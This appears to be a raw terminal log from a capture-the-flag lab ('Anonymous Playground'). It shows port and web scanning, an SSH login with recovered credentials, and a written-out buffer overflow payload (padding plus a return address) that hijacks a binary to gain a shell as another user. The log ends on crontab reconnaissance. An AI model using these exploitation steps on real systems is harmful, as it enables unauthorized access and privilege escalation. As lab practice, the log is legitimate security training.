┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace] └─$ sudo nmap -p- --min-rate=10000 10.10.1.59 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:08 CST Nmap scan report for 10.10.1.59 Host is up (0.30s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds
┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace] └─$ sudo nmap -sV -sT -O -p22,80 10.10.1.59 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:09 CST Nmap scan report for 10.10.1.59 Host is up (0.26s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds
┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace] └─$ sudo nikto -h 10.10.1.59 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.10.1.59 + Target Hostname: 10.10.1.59 + Target Port: 80 + Start Time: 2023-07-05 10:12:32 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.29 (Ubuntu) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Cookie access created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + No CGI Directories found (use '-C all' to force check all possible dirs) + /robots.txt: Entry '/zYdHuAKjP/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file + /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed + /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649 + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /css/: Directory indexing found. + /css/: This might be interesting. + /images/: Directory indexing found. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + 8076 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2023-07-05 10:49:23 (GMT8) (2211 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
<div class='row'> <div class='col'> <p class='text-center'>Access granted. <br /> Well done getting this far. But can you go further? <br /> <br /> <span style='font-size: 30px;'>hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN</span> </p> </div> </div> </div> </body> * Connection #0 to host 10.10.1.59 left intact
┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace] └─$ ssh magna@10.10.1.59 The authenticity of host '10.10.1.59 (10.10.1.59)' can't be established. ED25519 key fingerprint is SHA256:zKvTLbgKsGoKUlP7w/r2yJkjWulPOJtp0DhBDy/GlFQ. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.1.59' (ED25519) to the list of known hosts. magna@10.10.1.59's password: Permission denied, please try again. magna@10.10.1.59's password: Permission denied, please try again. magna@10.10.1.59's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-109-generic x86_64)
Check out this binary I made! I've been practicing my skills in C so that I can get better at Reverse Engineering and Malware Development. I think this is a really good start. See if you can break it!
P.S. I've had the admins install radare2 and gdb so you can debug and reverse it right here!
magna@anonymous-playground:~$ python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld Who do you want to hack? We are Anonymous. We are Legion. We do not forgive. We do not forget. [Message corrupted]...Well...done. Segmentation fault (core dumped)
magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld Who do you want to hack? We are Anonymous. We are Legion. We do not forgive. We do not forget. [Message corrupted]...Well...done. whoami Segmentation fault (core dumped)
magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x58\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld Who do you want to hack? We are Anonymous. We are Legion. We do not forgive. We do not forget. [Message corrupted]...Well...done. whoami spooky python -c "import pty;pty.spawn('/bin/bash')" spooky@anonymous-playground:~$
spooky@anonymous-playground:/home/dev$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.